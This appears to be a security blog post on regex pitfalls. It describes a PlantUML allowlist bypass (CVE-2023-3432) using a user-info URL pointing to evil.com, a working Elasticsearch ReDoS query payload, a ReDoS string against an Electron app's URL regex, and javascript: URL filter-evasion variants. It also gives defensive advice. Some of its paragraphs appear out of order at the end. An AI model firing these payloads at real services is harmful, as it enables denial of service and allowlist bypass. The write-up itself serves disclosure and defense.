👨‍💻
Home
CTFsPlaygroundOSCPBuy Me a Flag 🚩
  • Zeyu's Infosec Blog
  • CTF Writeups
  • Playground
  • OSCP
  • 2023
    • DEF CON 31 CTF && Midnight Sun CTF Finals 2023
    • From XS-Leaks to SS-Leaks Using object
    • Regular Expressions Are Hard
    • ReadiumJS Cloud Reader — Everybody Gets an XSS!
  • 2022
    • HTTP Request Smuggling in the Multiverse of Parsing Flaws
    • Hosting a CTF — SEETF 2022 Organizational and Infrastructure Review
Powered by GitBook
On this page
  • A Tale of Flawed Regex (CVE-2023-3432)
  • This is Why We Can't Have Nice Things
  • What Can We Learn From This?
  • When ReDoS Should Not Be Out of Scope: Bringing Down Your Elasticsearch Cluster
  • Scripting Module to ReDoS
  • Attacker Leverage and My Philosophy on DoS
  • ReDoS in Single-Threaded Applications
  • Wrapping Up

Was this helpful?

  1. 2023

Regular Expressions Are Hard

How to avoid common pitfalls.

PreviousFrom XS-Leaks to SS-Leaks Using objectNextReadiumJS Cloud Reader — Everybody Gets an XSS!

Last updated 1 year ago

Was this helpful?

From insufficient security fixes to ReDoS, regular expressions are hard to get right. Yet, they are integral to modern software security and development. Hopefully this article helps you avoid common pitfalls before it's too late!

A Tale of Flawed Regex (CVE-2023-3432)

Let's begin with a story of how an innocent regex change led to a security vulnerability.

A few months ago, I was looking into a particular rich text editor when I noticed that it supported an interesting integration — . This was an interesting project that allows users to write UML as code, and have a web server turn that code into a graphical UML diagram.

What immediately caught my eye was how utterly complex the project was, given its seemingly simple use case. The more complex any software is, the more difficult it is to ensure security. Going over to the page of the PlantUML documentation would show a treasure trove of builtin functions with interesting security implications.

Additionally, this function allows fetching from a URL, so SSRF was also present.

Great, so only PlantUML instances running on the default security profile were vulnerable, right? I wanted to see if I could break one of the higher-security modes, so I looked into the ALLOWLIST mode. With this profile, only allowlisted URLs can be reached, limiting the impact of SSRF.

This is Why We Can't Have Nice Things

private boolean isInUrlAllowList() {
  final String full = cleanPath(internal.toString());
  for (String allow : getUrlAllowList())
    if (full.startsWith(cleanPath(allow)))
      return true;

  return false;
}

However, PlantUML attempts to remove the user information portion of the URL before performing the startsWith check.

private static String removeUserInfoFromUrlPath(String url) {
  // Simple solution:
  final Matcher matcher = PATTERN_USERINFO.matcher(url);
  if (matcher.find())
    return matcher.replaceFirst("$1$3");

  return url;
}

This should have been a good thing, but the regular expression used ruined everything. Consider the following regex that captures the user information in the 2nd group and the actual host in the 3rd group.

private static final Pattern PATTERN_USERINFO = Pattern.compile("(^https?://)([-_0-9a-zA-Z]+@)([^@]*)");

It assumes that the user information part always contains the characters [-_0-9a-zA-Z]+. So if we use https://plantuml.com@evil.com, there is no match! In fact, the regex fails to perform its intended function since the format for user information in URLs is <username>:<password>@<host> and the regex does not contain :.

So, back to basics — a simple https://allowlisted.url.com@evil.com bypass would allow us to reach any arbitrary URL.

What Can We Learn From This?

Using the getHost method, one can get the hostname of the URL, ignoring other parts of the URL like user information. This hostname can then be matched against the whitelist — simple!

Don't make your life harder. Regex-based whitelists and blacklists are hard to get right.

When ReDoS Should Not Be Out of Scope: Bringing Down Your Elasticsearch Cluster

Bug bounty programs often classify Denial of Service (DoS) issues as out of scope. This is even more likely for ReDoS issues, a specific subclass of DoS that exploits the fact that most regex implementations may reach extreme situations that cause them to work very slowly.

This is due to a regex engine feature called backtracking, an algorithmic technique that brute forces every combination in order to solve a problem. When a "dead end" is encountered, the algorithm simply traces its steps back to previous nodes and explores other unvisited nodes.

In the context of regular expressions, these dead ends are simply non-matches. Take the regex ^(a+)+$. A non-match would be aaaaX. Because of the nested quantifiers, backtracking becomes exponential with more as. This is called catastrophic backtracking.

In a bug bounty programme a while back, I found an exposed Elasticsearch API that allowed me to run any query on the Elasticsearch instance. The Elasticsearch data wasn't particularly sensitive, so I had to find another way to escalate the impact.

A developer mentioned that "it is possible for a sufficiently determined malicious user to write searches that overwhelm the Elasticsearch cluster and bring it down". Huh.

Scripting Module to ReDoS

{
   "aggs":{
      "ContentType":{
         "terms":{
            "field":"ContentType",
            "size":25
         }
      }
   },
   "query":{
      "bool":{
         "must":[
            {
               "script":{
                  "script":{
                     "source":"params.x =~ /a{0,7}{0,10}$/",
                     "params":{
                        "x":"aaaaaaa"
                     }
                  }
               }
            }
         ]
      }
   },
   "highlight":{
      "fields":{
         "*":{
            
         }
      },
      "fragment_size":"350"
   }
}

In this script, only 23 steps is needed in the regex algorithm to find the match.

But when the last character in the test string is changed to an x, the string aaaaaax will cause the algorithm to take 74,380 steps instead.

Now, what if we used /((a{0,7}){0,7}){0,10}$/? Regex101 detects catastrophic backtracking and gives up.

In this particular program, the difference in computational complexity becomes very noticeable once we look at the took attribute of the response JSON.

I ended up reporting the following query, which caused the server to take more than a minute to respond. This was around a 3,000x amplification from the original query time of 20ms.

"source":"params.x =~ /a{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,10}$/  ? false : false",
"params":{
   "x":"aaaaaax"
}

Clearly, we could continue adding more {0,7} to the regex to strengthen the payload until it crashes the Elasticsearch service. To respect the program rules against performing DoS attacks, I did not test any payloads stronger than this.

Attacker Leverage and My Philosophy on DoS

Alas, this adventure only served to fuel my ongoing gripe with the status quo of classifying all DoS issues as out of scope in bug bounty programs.

It's understandable that companies and organizations don't want people spamming their infrastructure to report DoS issues. But when you have an exponential amplification vector, it's dangerous to ignore.

The traditional CIA model has three problem areas, and Availability is one of them. What's important is leverage. How much leverage does the attacker have over your resources?

If an attacker can use a single HTTP request to bring your server to its knees, that's a very high-leverage DoS vector. On the other hand, if the attacker has to use significant resources, like a botnet, to stage a DDoS, then that's a very low-leverage DoS vector. I definitely agree that low-leverage DoS vectors should be out of scope!

I hope that more people adopt this view and become more accepting of DoS vulnerabilities in application security. In this particular case, it is definitely a high-leverage vulnerability that deserves attention. Unfortunately, the team will likely never fix it.

ReDoS in Single-Threaded Applications

Node.js is a single-threaded, event-driven JavaScript runtime. Simply put, everything happens on a single-threaded "event loop". When things happen (such as a new request), a callback is triggered. This fills up the event queue, which the event loop works to clear.

All of this is to say, if a regular expression is being tested in JavaScript, nothing else can happen until the test is complete. For example, if a Node.js web server is handling a request, and is using a regex to validate one of the request parameters, no other requests can go through until this is done.

This has client-side implications as well — there is no way to push work off to a background thread to keep the UI responsive, everything has to happen in the event loop.

^(?:(?:https)://)(?:\S+(?::\S*)?@)?(?:(?!(?:10|127)(?:\.\d{1,3}){3})(?!(?:169\.254|192\.168)(?:\.\d{1,3}){2}) [...REDACTED...] |(?:(?:[a-z\u00a1-\uffff0-9]-*)*[a-z\u00a1-\uffff0-9]+)(?:\.(?:[a-z\u00a1-\uffff0-9]-*)*[a-z\u00a1-\uffff0-9]+)*)(?::\d{2,5})?(?:[/?#]\S*)?$

This regex was tested every time the user clicked on a link, so sending the following link to a victim can cause their application to hang for several seconds.

("https://6" + "@:-".repeat(8075) + "\t")

Client-side DoS vectors like these are also hard to ignore — who doesn't remember the viral WhatsApp bug that crashed the app whenever someone sent an evil message?

Wrapping Up

Writing regular expressions is hard. On one hand, security-oriented regular expressions need to be able to catch all edge cases and potential bypasses. On the other, we need to avoid overly complex regular expressions that introduce ReDoS vectors.

On delicate attack surfaces like URL parsing, it's almost always better to go with existing parsers instead of trying to reinvent the wheel. For instance, JavaScript's URL class is WHATWG URL Standard compliant, which means that it parses URLs exactly how a standards-compliant browser would.

It is way better to prevent XSS, for example, by using new URL(dirty).protocol === 'javascript:' instead of trying to use a regular expression to catch javascript: URLs, simply because there are many ways to write the same URL. Your custom regex might catch javascript:alert(), but does it catch all of the following URLs? It might be hard to say.

  • JAVASCRIPT:alert()

  • \x00javascript:alert()

  • java\r\nscript:alert()

  • java\tscript:alert()

  • javascript\r\n:alert()

If regular expressions have to be used, it's often wise to avoid the following patterns to prevent ReDoS:

  • Nesting quantifiers, like (a+)+

  • Non-mutually exclusive alternations, like (.|a)*

  • Non-mutually exclusive quantifiers in sequence, like a.*?b.*?c

I hope that this has been an interesting read!

While most of the sensitive functions like %getenv were blocked in the default security profile of the web server, %load_json was not. This allowed us to read any local JSON file and confirm whether any file exists on the filesystem. This turned out to be an oversight (and is assigned ), since the !include and !theme directives (which also enable local file reading) were subject to the security profile checks.

Taking a closer look at where this check is performed (), we see that each URL is first cleaned through cleanPath, then checked against the allowlist with startsWith.

Normally, using startsWith allows a trivial bypass using the user information part of a URL, which contains credentials.

But how did this vulnerability come about? In attempting to a , the PATTERN_USERINFO was changed, introducing the limited set of characters that would match the user information part of the URL.

Regular expressions are hard to get right. But more importantly, don't reinvent the wheel! Java already comes with a that has been tried and tested to perform standards-compliant URL parsing.

I found on the Elasticsearch forum which I thought was pretty interesting.

I couldn't find any online resources on how to do this, so I had to try to figure it out myself. Eventually, when exploring the Elasticsearch documentation, I found the . The scripts were well-sandboxed, and I couldn't find a way to escalate this into an RCE.

Thankfully, though, allow us to run regular expressions. The following would run a script that simply checks if aaaaaaa fulfills the regex /a{0,7}{0,10}$/. As the server URL encodes many characters, I was only able to work with the {...} quantifiers to increase time complexity.

It gets even more interesting when modern desktop apps are built on frameworks like that run on Node.js. Recently, I came across a very complex URL validation regex in an Electron app.

CVE-2023-3431
source
basic authentication
fix
previous issue
URL class
this post
scripting module
Painless scripts
Electron
PlantUML
Preprocessing
A Tale of Flawed Regex (CVE-2023-3432)
When ReDoS Should Not Be Out of Scope: Bringing Down Your Elasticsearch Cluster
ReDoS in Single-Threaded Applications